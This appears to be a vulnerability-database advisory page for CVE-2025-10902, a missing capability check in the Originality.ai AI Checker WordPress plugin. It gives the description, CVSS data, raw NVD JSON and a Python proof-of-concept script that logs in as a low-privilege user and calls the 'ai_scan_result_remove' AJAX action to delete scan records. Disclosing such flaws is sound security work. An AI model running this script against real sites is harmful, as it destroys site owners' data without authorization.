Security Vulnerability Report
中文
CVE-2025-10902 CVSS 4.3 MEDIUM

CVE-2025-10902

Published: 2025-10-24 09:15:42
Last Modified: 2026-04-15 00:35:42

Description

The Originality.ai AI Checker plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'ai_scan_result_remove' function in all versions up to, and including, 1.0.15. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all data in the wp_originalityai_log database table, which can include post titles, scan scores, credits used, and other data.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Originality.ai AI Checker WordPress Plugin <= 1.0.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-10902 PoC - Originality.ai AI Checker Plugin IDOR # Target: WordPress site with Originality.ai plugin <= 1.0.15 def exploit_idor(target_url, username, password, scan_result_id): """ Exploit the missing capability check vulnerability in ai_scan_result_remove function """ # Setup session session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url, 'testcookie': '1' } print(f"[*] Logging in as {username}...") response = session.post(login_url, data=login_data, cookies={'wordpress_test_cookie': 'WP Cookie check'}) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed!") return False print("[+] Login successful!") # Step 2: Exploit the IDOR vulnerability exploit_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'ai_scan_result_remove', 'scan_result_id': scan_result_id # Can be any ID due to missing auth check } print(f"[*] Exploiting IDOR vulnerability to delete scan result ID: {scan_result_id}...") response = session.post(exploit_url, data=exploit_data) if response.status_code == 200 and 'success' in response.text.lower(): print("[+] Successfully deleted scan result!") return True else: print(f"[-] Exploitation failed. Response: {response.text}") return False if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <scan_result_id>") print(f"Example: python {sys.argv[0]} http://example.com subscriber password 1") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] scan_id = sys.argv[4] exploit_idor(target, user, pwd, scan_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10902", "sourceIdentifier": "[email protected]", "published": "2025-10-24T09:15:42.080", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Originality.ai AI Checker plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'ai_scan_result_remove' function in all versions up to, and including, 1.0.15. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all data in the wp_originalityai_log database table, which can include post titles, scan scores, credits used, and other data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/originality-ai/trunk/OriginalityAI.php#L532", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3371428", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/80dd4f6a-20dd-4532-913b-ab08f89db836?source=cve", "source": "[email protected]"}]}}